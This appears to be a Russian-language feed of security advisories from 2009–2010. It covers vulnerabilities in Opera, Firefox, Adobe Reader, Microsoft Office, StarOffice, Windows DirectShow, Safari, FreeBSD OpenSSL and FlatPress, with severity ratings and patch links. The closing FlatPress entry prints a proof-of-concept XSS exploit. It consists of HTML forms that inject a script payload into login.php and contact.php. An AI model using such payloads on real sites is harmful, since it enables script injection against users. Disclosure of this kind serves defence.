28 апреля, 2010

Программа: Opera 10.52 для Windows, возможно другие версии.

Опасность: Высокая

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю скомпрометировать целевую систему.

Уязвимость существует из-за ошибки, которая возникает при длительной записи данных на страницу с помощью функции document.write(). Удаленный пользователь может с помощью специально сформированного Web сайта заставить приложение обратиться к неинициализированной памяти и выполнить произвольный код на целевой системе.

URL производителя: www.opera.com

Решение: Установите последнюю версию 10.53 с сайта производителя.

18 февраля, 2010

Программа: Mozilla Firefox версии до 3.0.18 и 3.5.8

Опасность: Высокая

Наличие эксплоита: Нет

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и скомпрометировать целевую систему.

1. Уязвимость существует из-за множественных ошибок в browser engine. Удаленный пользователь может вызвать повреждение памяти и скомпрометировать целевую систему.

2. Уязвимость существует из-за ошибки в реализации типов данных массива Web Worker при обработке опубликованных сообщений. Удаленный пользователь может вызвать повреждение памяти и скомпрометировать целевую систему.

3. Уязвимость существует из-за ошибки при обработке состояний нехватки памяти в HTML парсере. Удаленный пользователь может с помощью специально сформированного Web сайта вызвать повреждение памяти и выполнить произвольный код на целевой системе.

4. Уязвимость существует из-за ошибки в реализации функции showModalDia ... Читать дальше »

Множественные уязвимости в Adobe Reader и Acrobat

13 февраля, 2010

Программа:
Adobe Reader версии до 8.2.1 и 9.3.1
Adobe Acrobat версии до 8.2.1 и 9.3.1

Опасность: Высокая

Наличие эксплоита: Нет

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю обойти некоторые ограничения безопасности и скомпрометировать целевую систему.

1. Уязвимость существует из-за ошибки в Flash Player. Подробное описание уязвимости:
www.securitylab.ru/vulnerability/390767.php

2. Уязвимость существует из-за неизвестной ошибки, которая позволяет удаленному пользователю выполнить произвольный код на целевой системе.

URL производителя: www.adobe.com

Решение: Установите последнюю версию 8.2.1 или 9.3.1 с сайта производителя.

11 ноября, 2009

Программа:
Microsoft Office XP
Microsoft Office 2003
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac
Microsoft Office Word Viewer
Microsoft Open XML File Format Converter for Mac

Опасность: Высокая

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю скомпрометировать целевую систему.

Уязвимость существует из-за ошибки при обработке определенной информации о файле. Удаленный пользователь может с помощью специально сформированного документа Word вызвать повреждение памяти и выполнить произвольный код на целевой системе.

URL производителя: www.microsoft.com

Решение: Установите исправление с сайта производителя.

Microsoft Office XP SP3:
http://www.microsoft.com/downloads/details.aspx?familyid=0369fae5-958b-4eba-83a4-9c07e701c273

Microsoft Office 2003 SP3:
http://www.microsoft.com/downloads/details.aspx?familyid=6b77bc62-bcbb-4b9a-97d1-a49c ... Читать дальше »

18 сентября, 2009

Программа: StarOffice/StarSuite 7, 8, 9

Опасность: Высокая

Наличие эксплоита: Нет

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю скомпрометировать целевую систему.

Подробное описание уязвимостей:
www.securitylab.ru/vulnerability/384441.php

URL производителя: www.sun.com

Решение: Установите исправление с сайта производителя.

SPARC Platform
StarOffice/StarSuite 7 с исправлением 14 (установите исправление 116519-18)
StarOffice 8 с исправлением 13 (установите исправление 120185-18)
StarSuite 8 с исправлением 13 (установите исправление 120189-18)
StarOffice 9 с исправлением 3 (установите исправление 142188-01)
StarSuite 9 с исправлением 3 (установите исправление 142189-01)

x86 Platform
StarOffice/StarSuite 7 с исправлением 14 (установите исправление 117073-16)
StarOffice 8 с исправлением 13 (установите исправление 120186-18)
StarSuite 8 с исправле ... Читать дальше »

22 июля, 2009

Программа: Mozilla Firefox версии до 3.0.12

Опасность: Средняя

Наличие эксплоита: Нет

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю обойти некоторые ограничения безопасности, произвести XSS нападение и скомпрометировать целевую систему.

1. Уязвимость существует из-за неизвестной ошибки в Browser engine. Удаленный пользователь может скомпрометировать целевую систему.

2. Целочисленное переполнение существует из-за ошибки в функционале обработке base64-кодированных данных. Удаленный пользователь может скомпрометировать целевую систему.

3. Уязвимость существует из-за ошибки при обработке множественных RDF файлов, загруженных в древовидный элемент XUL. Удаленный пользователь может скомпрометировать целевую систему.

4. Уязвимость существует из-за ошибки при обработке двойных фреймов. Удаленный пользователь может вызвать повреждение памяти и ... Читать дальше »

06 июля, 2009

Программа:
Microsoft Windows XP
Microsoft Windows 2003

Опасность: Критическая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю скомпрометировать целевую систему.

Уязвимость существует из-за ошибки проверки границ данных при обработке потокового видео в BDATuner.MPEG2TuneRequest.1 ActiveX компоненте (msVidCtl.dll) в Microsoft DirectShow. Удаленный пользователь может с помощью специально сформированного Web сайта вызвать переполнение стека и выполнить произвольный код на целевой системе.

Примечание: уязвимость активно эксплуатируется в настоящее время.

URL производителя: www.microsoft.com

Решение: Установите исправление с сайта производителя.

Windows XP SP2/SP3:
... Читать дальше »

09 июля, 2009

Программа: Apple Safari версии до 4.0.2 

Опасность: Высокая 

Наличие эксплоита: Нет 

Описание: 
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и скомпрометировать целевую систему.

1. Уязвимость существует из-за ошибки при обработке родительских и верхних объектов в компоненте WebKit. Удаленный пользователь может с помощью специально сформированного сайта выполнить произвольный код сценария в браузере жертвы в контексте безопасности другого сайта. 

2. Уязвимость существует из-за ошибки в компоненте WebKit при обработке числовых ссылок. Удаленный пользователь может с помощью специально сформированного Web сайта вызвать повреждение памяти и выполнить произвольный код на целевой системе. 

URL производителя: www.apple.com/safari/ 

Решение: Установите последнюю версию 4.0.2 с сайта производителя. 

Уязвимость в OpenSSL в FreeBSD

23 апреля, 2009

Программа: FreeBSD версии 6.3, 6.4, 7.0, 7.1 

Опасность: Средняя 

Наличие эксплоита: Нет 

Описание: 
Уязвимость позволяет удаленному пользователю произвести DoS атаку.

Подробное описание уязвимости:
www.securitylab.ru/vulnerability/376517.php #1 

URL производителя: www.freebsd.org 

Решение: Установите исправление с сайта производителя. 

FreeBSD 7.x
http://security.FreeBSD.org/patches/SA-09:08/openssl.patch
http://security.FreeBSD.org/patches/SA-09:08/openssl.patch.asc

FreeBSD 6.x
http://security.FreeBSD.org/patches/SA-09:08/openssl6.patch
http://security.FreeBSD.org/patches/SA-09:08/openssl6.patch.asc 

Источники:  
FreeBSD-SA-09:08.openssl: Remotely exploitable crash in OpenSSL


CVE:  
CVE-2009-0590

Программа: FlatPress 0.x

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных в параметре "name" сценарием contact.php и в параметрах "user" и "pass" сценарием login.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Эксплоит:

<form method="post" action="http://localhost/flatpress/login.php">
<input type="text" name="user" value='"><script>alert(1)</script>'>
<input type=submit></form>
<form method="post" action="http://localhost/flatpress/login.php">
<input type="text" name="pass" value='"><script>alert(1)</script>'>
<input type=submit></form>
<form method="post" action="http://localhost/flatpress/contact.php">
<input type="text" name="name" value='"><sc ... Читать дальше »